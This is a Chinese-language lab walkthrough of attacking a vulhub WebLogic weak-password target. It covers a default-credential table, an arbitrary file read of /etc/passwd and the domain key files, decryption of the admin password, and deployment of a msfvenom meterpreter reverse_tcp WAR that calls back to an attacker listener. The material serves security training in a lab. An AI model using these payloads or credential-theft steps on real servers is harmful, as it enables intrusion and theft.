WebLogic 是 Oracle 公司开发的应用服务器,主要用作开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。它在历史上曾出现过多个安全漏洞,其中包括弱口令、任意文件上传、SSRF、反序列化漏洞等
vulhub:多个靶场的集合
systemctl stop firewalld.service
setenforce 0
systemctl restart docker.service
cd /var/local/vulhub-master/weblogic/weak_password
docker-compose up -d
[root@localhost weak_password]# docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 5ebeb02ea02a vulhub/weblogic:10.3.6.0-2017 "startWebLogic.sh" 54 minutes ago Up 54 seconds 0.0.0.0:5556->5556/tcp, :::5556->5556/tcp, 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp weak_password_weblogic_ http://192.168.10.5:7001/

docker-compose stop
[root@localhost weak_password]# docker-compose stop Stopping weak_password_weblogic_1 ... done [root@localhost weak_password]# cd .. [root@localhost weblogic]# ls CVE-2017-10271 CVE-2018-2628 CVE-2018-2894 CVE-2020-14882 CVE-2023-21839 ssrf weak_password [root@localhost weblogic]# cd ssrf/ [root@localhost ssrf]# docker-compose up -d Starting ssrf_redis_1 ... done Starting ssrf_weblogic_1 ... done [root@localhost ssrf]# weblogic弱口令:
| 用户名 | 密码 |
|---|---|
| system | password |
| weblogic | weblogic |
| admin | secruity |
| joe | password |
| mary | password |
| system | sercurity |
| wlcsystem | wlcsystem |
| weblogic | Oracle@123 |






通过漏洞读取weblogic密钥及密文,使用AES解密出后台密码
密文绝对路径: /root/Oracle/Middleware/user_projects/domains/base_domain/security/Se rializedSystemIni.dat 密钥绝对路径: /root/Oracle/Middleware/user_projects/domains/base_domain/config/con fig.xml 漏洞接口路径:
http://192.168.10.5:7001/hello/file.jsp?path=/etc/passwd 
请求:
响应:



config.xml是base_domain的全局配置文件
其中

地址:https://github.com/TideSec/Decrypt_Weblogic_Password 工具路径:Decrypt_Weblogic_Password-master\Tools5-weblogic_decrypt 
创建.bat文件将其保存至工具目录
@echo off echo Starting the weblogic_decrypt.jar application... java -jar weblogic_decrypt.jar echo Application has ended. Press any key to exit. pause > nul msfvenom -p java/meterpreter/reverse_tcp lhost=攻击者ip lport=4444 -f war -o java.war 
点击左侧 部署->安装->上载文件->上传war包->(全部下一步)-> 完成 

msfconsole use exploit/multi/handler set payload java/meterpreter/reverse_tcp set LHOST 192.168.10.128 set LPORT 4444 exploit 
http://192.168.10.5:7001/java 